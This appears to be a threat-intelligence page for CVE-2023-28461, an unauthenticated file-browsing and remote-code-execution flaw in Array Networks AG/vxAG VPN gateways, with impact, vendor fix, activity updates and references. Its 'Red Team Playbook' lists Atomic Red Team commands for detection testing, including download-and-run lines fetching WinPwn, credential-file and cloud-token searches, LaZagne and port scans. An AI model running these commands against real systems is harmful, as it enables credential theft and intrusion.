CVE-2023-28461
Overview
This vulnerability is an authentication bypass combined with improper access control in Array Networks Array AG Series and vxAG SSL VPN gateways. The root cause lies in the handling of a 'flags' attribute within an HTTP header that allows unauthorized browsing of the filesystem. The affected component is the SSL VPN gateway's HTTP request processing mechanism in versions 9.4.0.481 and earlier.
Vulnerability Description
Array Networks Array AG Series and vxAG (9.4.0.481 and earlier) allow remote code execution. An attacker can browse the filesystem on the SSL VPN gateway using a flags attribute in an HTTP header without authentication. The product could then be exploited through a vulnerable URL. The 2023-03-09 vendor advisory stated "a new Array AG release with the fix will be available soon."
Impact
An unauthenticated attacker can remotely browse the filesystem of the SSL VPN gateway, potentially accessing sensitive configuration files and credentials. This unauthorized access enables further exploitation, including remote code execution on the device. No user interaction or valid credentials are required to exploit this flaw, leading to full system compromise and potential lateral movement within the network environment.
Solution
According to the vendor advisory dated 2023-03-09, Array Networks will release a new version of the Array AG firmware containing a fix for this vulnerability. Administrators should monitor the official Array Networks support portal for the updated release and apply the patch promptly once available. The advisory and patch details can be found at https://support.arraynetworks.net/prx/001/http/supportportal.arraynetworks.net/documentation/FieldNotice/Array_Networks_Security_Advisory_for_Remote_Code_Execution_Vulnerability_AG.pdf.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Array Networks Array AG Series and vxAG versions prior to 9.4.0.481 is characterized by a critical flaw that allows for remote code execution. This issue arises from improper handling of HTTP headers, specifically through the exploitation of a flags attribute that enables an attacker to traverse the filesystem of the SSL VPN gateway without requiring any form of authentication. By manipulating the HTTP request, an attacker can gain unauthorized access to sensitive files and potentially execute arbitrary code on the affected system, leading to severe security breaches.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a targeted HTTP request to the SSL VPN gateway, leveraging the flags attribute to navigate the filesystem. Once access is gained, the attacker can locate vulnerable URLs that may allow for further exploitation, such as uploading malicious scripts or executing commands on the server. This scenario is particularly concerning as it does not necessitate any form of user authentication, making it accessible to unauthenticated attackers who can exploit the vulnerability from anywhere on the internet. The ease of exploitation, combined with the potential for significant damage, underscores the urgency for organizations to address this vulnerability promptly.
The real-world impact of this vulnerability is profound, posing substantial business risks. Organizations utilizing the affected products may face data breaches, loss of sensitive information, and potential legal ramifications due to non-compliance with data protection regulations. The ability for an attacker to execute arbitrary code can lead to a complete compromise of the affected system, allowing for further lateral movement within the network. This could result in the theft of intellectual property, customer data, or even the disruption of critical business operations. The financial implications of such incidents can be devastating, including costs associated with incident response, system recovery, and reputational damage.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching systems is paramount, as the vendor has indicated that a new release containing a fix will be available soon. Organizations should prioritize the deployment of this update as part of their patch management strategy. Additionally, implementing robust network security measures, such as intrusion detection systems (IDS) and web application firewalls (WAF), can help identify and block malicious traffic attempting to exploit this vulnerability. Monitoring logs for unusual access patterns or unauthorized file access can also aid in early detection of potential exploitation attempts.
In conclusion, the vulnerability affecting the Array Networks Array AG Series and vxAG represents a significant threat to organizations utilizing these products. The potential for remote code execution without authentication poses a serious risk to data integrity and system security. By understanding the technical details of the vulnerability, recognizing possible exploitation scenarios, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the ramifications of this critical security issue. It is essential for businesses to remain vigilant and proactive in their cybersecurity efforts to safeguard their assets and maintain trust with their stakeholders.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-28461, indicating a modest uptick in attempts to exploit the remote code execution vulnerability in Array Networks AG/vxAG devices. While the overall frequency remains low, this upward trend signals growing interest from threat actors, including those linked to ransomware operations known to leverage this vulnerability. The EPSS score remains high and stable, underscoring the continued potential for impactful exploitation. This development elevates the urgency for defenders to maintain heightened monitoring and situational awareness, as the vulnerability’s exploitation could facilitate unauthorized system access and data compromise. Although no new exploit variants or proof-of-concept releases have surfaced, the observed increase in detection activity suggests adversaries are actively probing affected environments, reinforcing the criticality of this threat in the current landscape.
Update 2 — August 04, 2026
CSURFACE threat intelligence has detected a subtle yet consistent increase in activity related to CVE-2023-28461, reflected in a modest rise in telemetry signals and a slight uptick in the EPSS score. This trend indicates that threat actors continue to actively probe and potentially exploit vulnerable Array Networks AG/vxAG devices, maintaining the vulnerability’s relevance in the threat landscape. The inclusion of this CVE in the KEV catalog, with explicit links to ransomware use, underscores its attractiveness to financially motivated adversaries seeking initial access or lateral movement opportunities. Although no new exploit variants or proof-of-concept codes have been identified, the persistent probing activity suggests adversaries are refining their tactics or expanding targeting efforts. For defenders, this evolving pattern signals a sustained and possibly growing risk of unauthorized remote code execution, reinforcing the need for vigilant monitoring of affected systems. The threat level remains critical, with the incremental increase in exploitation indicators emphasizing that the vulnerability continues to pose a high-impact risk in operational environments.
Update 3 — August 19, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2023-28461, reflecting a continued interest by threat actors in leveraging this critical remote code execution vulnerability. While no new exploit variants or proof-of-concept codes have surfaced, the incremental rise in detection activity suggests adversaries may be intensifying reconnaissance or broadening their attack scope. This subtle uptick aligns with the vulnerability’s inclusion in the KEV catalog and its known association with ransomware campaigns, underscoring its attractiveness for financially motivated threat groups. The stable EPSS score near the top percentile reinforces the high likelihood of exploitation in the wild. For defenders, this evolving pattern signals that the vulnerability remains an active and persistent threat, warranting sustained vigilance despite the absence of novel exploitation techniques. Consequently, the overall risk posture remains critical, with the recent telemetry trends indicating a steady, if modest, escalation in adversarial engagement.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Arraynetworks | Arrayos Ag | All |
cpe:2.3:o:arraynetworks:arrayos_ag:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-28461 |
| support.arraynetworks.net |
GitHub CVE
|
https://support.arraynetworks.net/prx/001/http/supportportal.arraynetworks.net/documentation/FieldNotice/Array_Networks_Security_Advisory_for_Remote_Code_Execution_Vulnerability_AG.pdf |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-28461 |